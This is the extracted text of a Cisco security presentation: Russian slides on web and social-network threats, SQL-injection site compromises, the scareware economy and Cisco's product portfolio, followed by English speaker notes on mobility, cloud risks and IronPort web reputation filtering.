3. Социальные сети в прицеле хакеров 21% 64% 47% 20% 55% Людей принимают «приглашения дружбы» от людей, которых они не знают Людей не думая кликают по ссылкам, присылаемым «друзьями» Пользователей Интернет уже становились жертвами заражений вредоносными программами Людей уже сталкивалось с кражей идентификационных данных Людей были подменены с целью получения персональных данных
8. А какой у вас пароль? 51% пользователей имеет обычно 1-4 пароля ко всем своим учетным записям
9. Malware Проблемы Web Утечки данных Нарушения правил использования 40% потерь в производительности в связи с использованием web для личных нужд во время работы Риск нарушения законодательства когда запрещенный контент загружается пользователями
12. SQL Injection (1 из 5)** *Source: IronPort TOC **Source: White Hat Security, Website Sec Statistics Report 10/2007 & PPT 8/2008
13. Хакеры атакуют легитимные сайты malicious Host www.iamlegitimate.com HTTP GET/ Botnetsнастраиваются и внедряют malware в web-узлы с помощью SQL Injections используя уязвимости в web-приложениях Хакері используют SQL Injections для вставки JavaScript iFrames, которые перенаправляют пользователей на web-сайты, на которых хостится malware
19. Но иногда вы сами помогаете хакерам Ссылка размещается (или посылается от имени) на взломанной учетной записи социальной сети Эта ссылка отсылает вас на сайт с «потрясным» видео, которое просит установить вас последнюю версию Flash player или отсутствующий кодек
28. Смена ландшафта угроз Известность Деньги Мотивация Дерзко Незаметно Метод Все равно Мишень Фокус Вручную Автомат Средства Подрыв Катастрофа Результат Уникальный код Tool kit Тип Инфраструктура Приложения Цель Изнутри Третье лицо Агент
29. Зачем это надо злоумышленникам?! $$$ Финансовые потоки $$$ Атаки первой волны Атаки второй волны Разработчики Посредники Результат Инструменты атак Прямая атака от хакера Слава Атака на отдельные системы и приложения Шпионаж Вредоносное ПО Создание ботнетов DDoS Заражение Вымогательство Черви Рассылка Спама Месть Вирусы Управление ботнетом: Аренда, продажа Реклама Трояны Фарминг, DNS Poisoning Фишинг/ Сбор информации Мошеннические продажи Шпионское ПО Кража информации Накручивание кликов Продажа информации Мошенничество
30. Неужели это выгодно?! Партнерская сеть по продаже scareware Партнеры загружают scareware на зараженные компьютеры и получают комиссию 60% c продаж Объем продаж за десять дней $147K (154825 установки и 2772 продажи) $5M в год Своих не бьем! Статистика продаж Bakasoftware за 10 дней Источник: http://www.secureworks.com/research/threats/rogue-antivirus-part-2/?threat=rogue-antivirus-part-2
31.
32. Объекты – это изображения, html-код, JavaScript…Скомпрометированные узлы берут вредоносное содержимое из внешних источников Безопасность – это просмотр каждого объекта в отдельности, а не только первоначального запроса.
33. BoingBoing.net: популярный блог Адресов в браузере: 1 HTTP запросов: 162 Изображений: 66с 18 разных доменов Скриптов: 87с 7доменов Cookie: 118с15доменов Flash объектов: 8 c 4доменов
35. У нас стоит антивирус и МСЭ! Эффективна ли защита рабочих станций основанная только на антивирусном ПО? Способен ли МСЭ проверять содержимое? Как технические средства помогут бороться с атаками с применением социальной инженерии?
37. Как бороться? Осведомлениеперсонала об угрозах ИБ Защита рабочих станций Контроль соответствия политике ИБ Безопасность контента Мониторинг заражений Контроль утечек информации
38. Удаленныйдоступ Совместнаяработа Мобильность Виртуализация «Облака» Отраслевая модель архитектуры безопасности * = Cisco Threat Intelligence ЗАЩИЩЕННЫЕСИСТЕМЫ УСТРОЙСТВО Расследованиеинцидентов Управление ресурсами БЕЗОПАСНОСТЬУСТРОЙСТВА Блокировка/ очистка памяти Новыеатаки Анти-вирус Шифрование Аудит БЕЗОПАСНОСТЬПРИЛОЖЕНИЯ Web-приложение Написание защищенного кода Вторжение Управлениесервисами Шифрование БЕЗОПАСНОСТЬКОНТЕНТА/ДАННЫХ Email Web DLP Управлениеданными УПРАВЛЕНИЕСЕТЬЮ/СИСТЕМОЙ Идентифи-кация Тревоги Журналы Мониторинг Каталоги Политика VPN МСЭ IDS / IPS Интерфейсы API БЕЗОПАСНОСТЬСЕТИ ДОВЕРЕННАЯ СИСТЕМА ИНФРАСТРУКТУРА Физич.уровень Устройство Вычисления Хранение Сеть * На основании типовых отраслевых моделей (Gartner, SANS Institute и др.)и опросов заказчиков
60. Решение для обеспечения защищенного доступа с учетом контекста: поддерживаются проводные, беспроводные и VPN-подключения
61.
62. Причины выбора Cisco SecureX 1 Полномасштабные средства мониторинга сети и сетевого управления: снижение сложности, повышение уровня защищенности Обеспечение выполнения согласованных политик безопасности с учетом контекста в масштабах всей ИТ-инфраструктуры Уникальные «интеллектуальные» решения для обнаружения угроз следующего поколения и защиты от них Интеграция с сетевыми решениями для создания масштабируемой инфраструктуры информационной безопасности от уровня оконечных устройств до уровня ЦОД Самые современные и инновационные решения и услуги в сфере информационной безопасности – для решения любых задач организаций всех типов и размеров 2 3 4 5
63. Так почему все-таки Cisco?! 1 Лидер мирового рынка сетевой безопасности. Обширное портфолио продуктов и услуг. Тесная интеграция с сетевой инфраструктурой. Архитектурный подход Поддержка и защита самых современных ИТ. Контроль качества. Исследования в области ИБ. Обучение и сертификация специалистов. Собственное издательство Сертификация на соответствие российским требованиям по безопасности. Сертифицированная криптография. Сертификация производства. Отраслевая экспертиза. Участие в разработке стандартов ИТ и ИБ, а также в отраслевых группах и комитетах. Участие в экспертизе НПА по ИБ Финансирование проектов по ИБ. Легитимный ввоз оборудования. Круглосуточная поддержка на русском языке. Склады запчастей по всей России. 1000+ партнеров 2 3 4 5
64. 95% компаний, которые попробовали Cisco IronPortстали пользователями этих решений. Контакт: security-request@cisco.ru
65. Хотите узнать больше? FAQ по импорту и сертификации Решения Cisco для ПДн и СТО,по сертифицированной криптографии Почему Cisco лучший выбор по ИБ?! http://www.facebook.com/CiscoRu … а также многое другое http://twitter.com/CiscoRussia http://www.youtube.com/CiscoRussiaMedia http://www.flickr.com/photos/CiscoRussia http://vkontakte.ru/Cisco
The business environment is changing fast, with new requirements to expand customer relationship, improve productivity and reduce cost, while introducing new IT business models. Result: the Security practitioner has to move even faster and anticipate potential threats and respond to risks they bring and to provide a security safety net that will allow the organization to move with change.
Mobility and Consumerization of endpointsStats on mobility trends (how many devices, by when)Stats on consumerization of endpoints in the workplaceList a couple of security breaches that happened due to mobilityCollaboration Stats on collaboration apps picking up in organizations/social mediaExample of security breaches for VoIP, Video conferencing, etcCloud/Virtualization/Externalization Key trends around cloud (private/virtual private/public)Example of security breaches for VoIP, Video conferencing, etc Slide layout: this slide should present 3 columns. The top part of each one will list the market trend and stats. The bottom part of each one (via build) will give a couple of security threats as a result of each respective change.Mobile ComputingLoss of personal information and data on mobile devices is a leading threat.For example, in July 2010, a data breach case involved a stolen laptop computer that contained personal information of more than 8,300 students and employees of P.K. Yonge Development Research School. The research school is affiliated with University of Florida. http://news.ufl.edu/2010/08/31/yonge-privacy/A similar security incident took place in November 2010. A laptop stolen in Georgia contained personal information of nearly 14,000 patients of Centra, which is a Lynchburg, VA based hospital system.http://www.myfoxatlanta.com/dpp/news/local_news/Centra%3A-Stolen-Laptop-Contains-Patient-Info-20101221-ap-sdThreats to mobile computing also come from malicious activities that attack their targets in public networks.A well known example is Firesheep. This is a Firefox web browser extension that can be used as a hacking tool to attack users of social media and other popular sites on a Wi-Fi network. This is a great example of mobile computing threats. In less than 6 months, more than 1 million downloads of this tool were made – some of these downloads perhaps have already turned into active attacks right now.https://github.com/codebutler/firesheep/downloads 2. CollaborationLoss of sensitive data and security violations are the leading threats associated with various forms of collaboration tools.Skype is a clear example. This is a communication tool that can support voice and video. The application itself is extremely resistant to reverse engineering and it uses strong encryption for its network traffic. As a result, Skype activities are difficult to detect and its communications nearly impossible to decipher. Skype can also bypass firewalls to create a backdoor to the internal network. For these reasons, Skype should be banned to prevent unauthorized communications and access on networks that are subject to strict legal or administrative regulations.http://www.sans.org/reading_room/whitepapers/voip/skype-practical-security-analysis_32918Unsecured instant messaging (IM) tools also pose many security threats, including:- Client Vulnerabilities: without proper testing, many IM clients can introduce security vulnerabilities on the endpoint device.- Data Theft: tunnel through the network firewall and email filter to transfer confidential materials out of an organization.- many othershttp://www.technicalinfo.net/papers/IMSecurity.htmlP2P sharing of copyright-protected materials is another known security issue for many universities and colleges.3. Virtualization and CloudThese new technologies introduce new threats.In virtualization, a new “attack surface” is born as a result of the virtual machines and the hypervisor.Gartner lists the following threats:•A Compromise of the Virtualization Layer Could Result in the Compromise of All Hosted Workloads•The Lack of Visibility and Controls on Internal Virtual Networks Created for VM-to-VM Communications Blinds Existing Security Policy Enforcement Mechanisms•Adequate Controls on Administrative Access to the Hypervisor/VMM Layer and to Administrative Tools Are Lacking•There Is a Potential Loss of Separation of Duties for Network and Security Controls When These are Virtualized http://www.gartner.com/DisplayDocument?ref=clientFriendlyUrl&id=1288115For cloud computing, many threats are identified due to changes in technologies and business processes. Cloud Security Alliance listed the following as top cloud computing threats.Threat #1: Abuse and Nefarious Use of Cloud Computing Threat #2: Insecure Interfaces and APIs Threat #3: Malicious Insiders Threat #4: Shared Technology Issues Threat #5: Data Loss or LeakageThreat #6: Account or Service HijackingThreat #7: Unknown Risk Profilehttp://www.cloudsecurityalliance.org/topthreats/csathreats.v1.0.pdf
The changing business environment is also shifting user expectations of IT. The Cisco Connected World Report shows greater demand for the ability to work from anywhere with the user’s device of choice, while using video and rich media to enhance communications. Simultaneously, the report showed that IT is struggling with the performance and security implications associated with the proliferation of mobile devices and the delivery of a dynamic networked organization. 60% believe they don’t need to be in the office to be productive66% would accept a lower-paying job (10%) for more work flexibility45% work an extra 2-3 hours a day since they are able to work outside of the office (additional 25% work 4+ hours)45% of IT professionals unprepared to make workforces more mobile57% of IT professionals said security is the biggest challenge in supporting a mobile and distributed workforce
This trend brings with it a set of business challenges, centered on malware, data loss, and acceptable use.Threat writers know that HTTP can get’em in the door and it’s difficult to defend such a real-time medium. More malware variations in 2008 than in all of history. 94% of malware attacks now coming via the web. Data Loss – there are more frequent examples of the CEO’s nightmare of landing on the front page over customer or partner records being compromised—and in many cases the web being the channel that the information leaked or was stolenAcceptable use challenges: draining productivity and introducing legal risk of offensive content entering the enterprise; but also risk that YouTube chokes off resources from critical business applications like WebEx
Modern malware is designed to evade legacy defenses. Two specific themes that we want to highlight: (1) exploiting legitimate sites; and (2) social engineering.Expoited Websites: Nearly 90% of threats today are launched via Exploited legitimate websites. High traffic, reputable sites such as MSNBC and Business Week.Shows why URL filtering is not a security solution: who would block the News category?Social Engineering: attacks takes advantage of interest in current events to take users to polished mal-sites. For example, on the eve of the US presidential inauguration a “news” story circulated about Obama’s purported decision to not take the oath of office. Almost every current event today is accompanied by a new malware threat.Other campaigns target trust of messages from friends, sending messages on Facebook or promoting YouTube videos.Beyond directing users to Web malware, these attacks also convince users to bypass their desktop defenses. “Installing this may give a virus warning. Simply click to proceed…” , highlighting the limitations of desktop defenses.
The changing business environment is also shifting user expectations of IT. The Cisco Connected World Report shows greater demand for the ability to work from anywhere with the user’s device of choice, while using video and rich media to enhance communications. Simultaneously, the report showed that IT is struggling with the performance and security implications associated with the proliferation of mobile devices and the delivery of a dynamic networked organization. 60% believe they don’t need to be in the office to be productive66% would accept a lower-paying job (10%) for more work flexibility45% work an extra 2-3 hours a day since they are able to work outside of the office (additional 25% work 4+ hours)45% of IT professionals unprepared to make workforces more mobile57% of IT professionals said security is the biggest challenge in supporting a mobile and distributed workforce
Web Reputation Filters examine every request made by the browser - from the initial HTML request to all subsequent data requests including live data, which may be fed from different domains. This gives IronPort's Web Reputation Filters a unique advantage over vendors that reduce Web reputation to a simple URL Filtering category. IronPort’s Web Reputation Filters is the industries only reputation system to include Exploited Website Defense, Botsite Defense and URL Outbreak Detection - protecting users from known and unknown exploits (including adware, Trojans, system monitors, keyloggers, malicious/ tracking cookies, browser hijackers, browser helper objects and phishing attacks) delivered through Cross-sight Scripting, Cross-sight Request Forgery, SQL Injections or invisible iFrames. The power behind the IronPort’s reputations technology comes from the systems pattern-base assessment techniques and per-object scanning capabilities. IronPort’s Web Reputation Filters is industry’s first and best Web reputation filtering system that provides a powerful outer layer of malware defense before it has a chance to enter the network.
Criminals are using their business acumen ("Cybercrime MBA") to maximize innovation and profits across a portfolio of criminal techniques and business modelsWe lack the framework to analyze criminal businesses at a macro levelThe CROI Matrix plots techniques and business models that make up the cybercrime product life cycle according to their growth and revenue potentialModeled on the Boston Consulting Group Growth-Share Matrix-- highlight how things are moving – phishing 1.0 (inoculation) into Zeus and money mules (due to better payment security), IM > Social networking, web exploits – major, developing technique, cash cows = less change…clockwise movementif they made into it rising star status…- DDoS got a lot of ink. Not part of the investment, a side benefit,
Overall picture: list of Cisco security solutions with perhaps the architecture as a backdrop.Cisco TrustSec, Cisco AnyConnect Secure Mobility, Cisco Virtual Office, PCI DSS Compliance, Threat Defense (Firewall, IPS), Cisco Content Security (email/web), Cisco Data Center Security, Cisco Virtualization and Cloud Security
AnyConnect Client: AnyConnect automatically creates an SSL VPN, IPSec VPN, or MACsec encrypted tunnelCatalyst Switch: Cisco TrustSec tags data with access policy, inspects MACsec encrypted traffic, assesses the health of the endpoint device, and provides role-based accessCisco ASA: Cisco ASA terminates SSL or IPSec VPN tunnel, provides traffic protectionCisco ISE: Cisco ISE provides role-based access policy and AAA (Authentication, Authorization, and Accounting) servicesNexus Switch:Cisco TrustSec inspects MACsec encrypted traffic, reads data policy tags, and enforces access policy
The changing business environment is also shifting user expectations of IT. The Cisco Connected World Report shows greater demand for the ability to work from anywhere with the user’s device of choice, while using video and rich media to enhance communications. Simultaneously, the report showed that IT is struggling with the performance and security implications associated with the proliferation of mobile devices and the delivery of a dynamic networked organization. 60% believe they don’t need to be in the office to be productive66% would accept a lower-paying job (10%) for more work flexibility45% work an extra 2-3 hours a day since they are able to work outside of the office (additional 25% work 4+ hours)45% of IT professionals unprepared to make workforces more mobile57% of IT professionals said security is the biggest challenge in supporting a mobile and distributed workforce
#3 casesTrusted security architecture with pervasive network visibility and control - reduce complexity and increase protectionThe industry’s most rich and innovative security portfolio - optimized for any organization size and needs today and into the futureUnique context aware threat protection and security intelligence discovers and protects against next generation of threatsConsistent enforcement of policy throughout an organization using posture and context to enable a secure borderless experience Network integration that enables security from the device, throughout the network, to the data center, gathering data and enforcing Validated with third-party ecosystem partners to ease integration and deployment
#3 casesTrusted security architecture with pervasive network visibility and control - reduce complexity and increase protectionThe industry’s most rich and innovative security portfolio - optimized for any organization size and needs today and into the futureUnique context aware threat protection and security intelligence discovers and protects against next generation of threatsConsistent enforcement of policy throughout an organization using posture and context to enable a secure borderless experience Network integration that enables security from the device, throughout the network, to the data center, gathering data and enforcing Validated with third-party ecosystem partners to ease integration and deployment